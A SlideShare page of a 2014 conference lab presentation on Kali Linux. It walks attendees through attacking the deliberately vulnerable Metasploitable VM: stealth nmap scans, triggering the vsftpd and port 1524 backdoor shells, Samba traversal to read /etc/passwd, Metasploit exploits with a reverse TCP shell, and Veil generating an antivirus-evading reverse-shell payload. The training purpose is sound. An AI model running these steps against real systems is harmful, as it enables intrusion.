Your SlideShare is downloading. ×
0
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Kali Linux - Falconer
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Kali Linux - Falconer

2,064

Published on

This is a presentation I gave at the Spring 2014 Ohio HTCIA Conference held at Salt Fork Lodge.

This is a presentation I gave at the Spring 2014 Ohio HTCIA Conference held at Salt Fork Lodge.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,064
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
214
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • Presentation on Kali LinuxTGodfrey – Falconer TechnologiesOhio HTCIA – Salt Fork conference – 5/2014
  • http://www.hackingwithkalilinux.tk/2014/02/getting-your-pentesting-lab-ready.htmlhttp://www.hacking-tutorial.com/http://www.blackmoreops.com/2014/03/03/20-things-installing-kali-linux/http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/http://efytimes.com/e1/fullnews.asp?edid=121888
  • https://pentest-tools.com/homehttp://www.softwaretestinghelp.com/penetration-testing-tools/https://pentestmag.com/http://resources.infosecinstitute.com/19-extensions-to-turn-google-chrome-into-penetration-testing-tool/http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/http://www.security-audit.com/blog/penetration-testing-tools/http://www.bulbsecurity.com/smartphone-pentest-framework/
  • http://kali4hackers.blogspot.com/http://www.hackingwithkalilinux.tk/2013/08/kali-linux.htmlhttp://www.youtube.com/watch?v=3OM22HqvX14http://www.kalilinux.net/community/threads/custome-command-prompt.243/http://hackwithkalilinux.blogspot.com/http://www.dailymotion.com/video/x1a348p_class-1-learn-kali-linux-basics-watch-in-hd_techhttp://www.markdubois.info/weblog/2014/02/kali-linux/http://go.kblog.us/2013/03/hacking-and-cracking-wep-with-kali-linux.htmlhttp://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/http://anonymous1769.blogspot.com/2013/12/all-commands-for-backtrack-kali-linux.htmlhttp://www.ehacking.net/2013/05/kali-linux-tutorial-websploit-framework.html
  • http://docs.kali.org/pdf/kali-book-en.pdfhttps://eforensicsmag.com/from-backtrack-to-kalilinux/http://www.amazon.com/Basic-Security-Testing-Kali-Linux/dp/1494861275/ref=sr_1_1?ie=UTF8&qid=1399928840&sr=8-1&keywords=kali+linuxhttp://www.amazon.com/Kali-Linux-Assuring-Security-Penetration/dp/184951948X/ref=sr_1_2?ie=UTF8&qid=1399928876&sr=8-2&keywords=kali+linux
  • https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/http://www.concise-courses.com/security/50-firefox-pentesting-addons/
  • https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/https://addons.mozilla.org/en-us/firefox/collections/michel-chamberland/pentesterstools/http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/http://www.concise-courses.com/security/50-firefox-pentesting-addons/
  • Transcript

    • 1. Kali Linux Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge
    • 2. Welcome – Salt Fork 2014
    • 3. Welcome Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.
    • 4. Who or What is ‘Kali’?
    • 5. Who is Kali? Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Anu Yadavalli
    • 6. Hindu Kali
    • 7. What is Kali Linux? Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.
    • 8. What’s on the DVD? /books ◦Official Kali Guide ◦eForensics /media ◦7-Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager /metaspolitable /PPT
    • 9. http://www.kali.org/
    • 10. Legend  We‟re going to type something  We‟re going to make a note  Might be a question?  We‟re going to click on something  Recon  Attack
    • 11. Ready?
    • 12. Use your powers for good
    • 13. Getting Ready… - Let‟s make a folder called  kali_2014 - Copy the DVD contents into that folder - Install 7-Zip - Install VMware Player Let‟s make sure the virtual environments are working and can „ping‟ each other
    • 14. VMware Player Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.
    • 15. Logins / Passwords Kali Login  root Kali Password  password Metaspolitable Login  msfadmin Metaspolitable Password  msfadmin
    • 16. Metaspolitable V/E  Login  msfadmin  Password  msfadmin  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
    • 17. Metaspolitable V/E Virtual Environment #1 ◦Metaspolitable  Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l ...vs... ls -la rm .X0-lock  startx
    • 18. Kali V/E  Login  root  Password  password  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
    • 19. Kali V/E Go to: Applications  System Tools  Preferences  System Settings  Display  Resolution: ____ Then…[Apply]
    • 20. Kali Updating From the command line, type  apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation.
    • 21. Are we good?
    • 22. There are several categories Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications Password Attacks Wireless Attacks Exploitation Tools Sniffing/Spoofing Maintaining Access Reverse Engineering Stress Testing Hardware Hacking Forensics Reporting Tools System Services
    • 23. Metapackages also exist
    • 24. Command Line Tools Presentation on Kali Linux
    • 25. ping  ping Packet InterNet Groper Port = 8 Establishes physical connectivity between two entities  (from Kali) ping <Target IP> Did it echo back?
    • 26. top  top Tells us what services are running, processes, memory allocation Basically, a live system monitor
    • 27. df  df Tells us how much space is available or „disk free‟
    • 28. du  du Tells us how much space is taken or „disk used‟. You can get a shorter report by…  „du –s‟ … (disk used –summary)
    • 29. free  free How much „free‟ memory is available
    • 30. ls  ls This is for „list‟  ls –l (list –long)  ls -la (list – long – all attributes)
    • 31. pwd  pwd Directory structure Means „path to working directory‟ or „print working directory‟
    • 32. ps / ps aux / pstree  ps Means „Process Status‟ ◦aux – auxiliary view ◦pstree – shows parent/child relationships ◦Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID)
    • 33. Both Environments Presentation on Kali Linux
    • 34. Can you ‘ping’ each other? Virtual Environment #1 (Metaspolitable) ◦Go to TERMINAL ◦ifconfig ◦…jot this number down… Virtual Environment #2 (Kali) ◦Go to TERMINAL ◦ifconfig ◦…jot this number down…
    • 35. CLI & Services Presentation on Kali Linux
    • 36. traceroute  traceroute Essentially, „tracert‟ in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network
    • 37. nmap  nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network
    • 38. nmap  nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – „sS‟ is stealth scan, „Pn‟ not to run a ping scan, and „A‟ is O/S detection, services, service pack.
    • 39. rlogin (from Metaspolitable)  rlogin –l root <Target IP>  whoami  tcpdump -i eth0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
    • 40. rpcinfo  rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.
    • 41. showmount  showmount –e <Target IP>  showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.
    • 42. telnet  telnet <Target IP> 21 After '220...'  user backdoored:)  <CTRL><]>  quit Port 20/21 is FTP
    • 43. telnet  telnet <Target IP> 6200 After 'Escape character...',  id; <CTRL><]>  quit Port 6200 - Oracle Notification Service remote port Oracle Application Server
    • 44. telnet  telnet <Target IP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.
    • 45. telnet  telnet <Target IP> 1524 After 'root@meta....',  id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.
    • 46. Are we good?
    • 47. smbclient  smbclient –L <//Target IP>  msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal  set RHOST <Target IP>  set SMBSHARE tmp
    • 48. smbclient  exploit ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type  exit
    • 49. smbclient  smbclient //<Target IP>/tmp Do you get the 'smb: >' prompt?  cd rootfs  cd etc  more passwd Do you get a list of all user accts?
    • 50. tcpdump On Kali… tcpdump –I eth0 src <Target IP> On Metaspolitable… ping www.yahoo.com open a Browser & go to CNN.com
    • 51. netdiscover On Kali netdiscover –i eth0 –r <Target IP>/24 Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks.
    • 52. nikto On Kali  nikto –h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.
    • 53. sqlmap On Kali sqlmap –u http://<Target IP> --dbs It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
    • 54. Wasp Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.
    • 55. Web Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application
    • 56. whatweb From Kali  whatweb <Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
    • 57. From Kali - msfconsole Presentation on Kali Linux
    • 58. msfconsole From Kali  service postgresql start  service metasploit start  msfconsole Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole We will then take a look at the built-in exploit tools
    • 59. msfconsole From [msf>] console  help search  show exploits  search dns ‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
    • 60. msfconsole From [msf>] console  search Microsoft  search diablo  search irc  search http Let’s try a few more to see what they do….
    • 61. msfconsole From [msf>] console, search for „unreal‟  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
    • 62. msfconsole From [msf>] console (ex: unreal)  set RHOST <IP Address>  show options  exploit 
    • 63. msfconsole From [msf>] console, search for „twiki‟  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT
    • 64. msfconsole From [msf>] console (ex: „twiki‟)  set RHOST <IP Address>  show options  exploit 
    • 65. msfconsole From [msf>] console, (target: Win XP)  use exploit/windows/smb/ms08_067_netapi  show options  show targets  set target 2
    • 66. msfconsole From [msf>] console, (target: Win XP)  show options  show advanced  show targets  show payloads
    • 67. msfconsole From [msf>] console, (target: Win XP)  set payload windows/shell_reverse_tcp  show options  set LHOST <Kali IP Address>  set RHOST <Target IP Address>
    • 68. msfconsole From [msf>] console, (target: Win XP)  show options  exploit  Any errors? 
    • 69. From Kali – more GUI Presentation on Kali Linux
    • 70. Zenmap Let‟s run Zenmap  Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap
    • 71. SHODAN Let‟s run SHODAN  Open a browser  www.shodanhq.com  type in „almost anything‟  …Be very nervous…
    • 72. FERN Let‟s run FERN  Kali Linux  Wireless Attacks  Wireless Tools  fern-wifi-cracker
    • 73. recon-ng Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng. recon-ng automated info gathering and network reconnaissance.
    • 74. recon-ng Let‟s run recon-ng…  cd /opt/recon-ng  /usr/bin/python recon-ng  show modules  recon/hosts/gather/http/web/google_site
    • 75. recon-ng Let‟s run recon-ng…  set DOMAIN <domain.com>  run (…let this run awhile…)  back (…previous level…)  show modules
    • 76. recon-ng Let‟s run recon-ng…  use reporting/csv  run  Will add your new information to /usr/share/recon-ng/workspaces/default
    • 77. dmitry If you want something more basic…dmitry  dmitry –s <domain.com>  It gives you site names & IP‟s
    • 78. veil Kali has many built-in tools, but you can always install even more (Debian- based). You may always wish to add more such as veil. veil Remote shell payload generator that can bypass many anti-virus programs.
    • 79. veil Let‟s run veil  veil-evasion  list (available payloads list)  use 13 (powershell/VirtualAlloc)  generate
    • 80. veil Let‟s run veil  1 (msfvenom)  [ENTER] (accept default)  Value for LHOST (Target IP)  Value for LPORT (ex: 4000)
    • 81. veil Let‟s run veil  Output name (“Squatch”)  It will store this new batch file to the  /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.
    • 82. Final Thoughts…
    • 83. Kali Information See „Notes‟ section in this slide
    • 84. Kali Comparisons See „Notes‟ section in this slide
    • 85. Kali-specific Websites See „Notes‟ section in this slide
    • 86. Kali Publications See „Notes‟ section in this slide
    • 87. Questions/Concerns
    • 88. But wait, that’s not all
    • 89. Kali in a box? Do you want to run Kali on tablet or phone? http://www.kali.org/how-to/kali-linux-android-linux-deploy/
    • 90. Pentesting with Firefox? The Firefox web browser is great tool to test vulnerabilities of a website. There is a portable version on PortableApps. I would suggest this version and install the needed plugins. Then, fire up the browser and „use your powers for good‟.
    • 91. Thank You
    • 92. Thank you Thank you for your time. Falconer Technologies TonyGodfrey@FalconerTechnologies.com 877 / TUX RULZ or 877 / 889-7859

    ×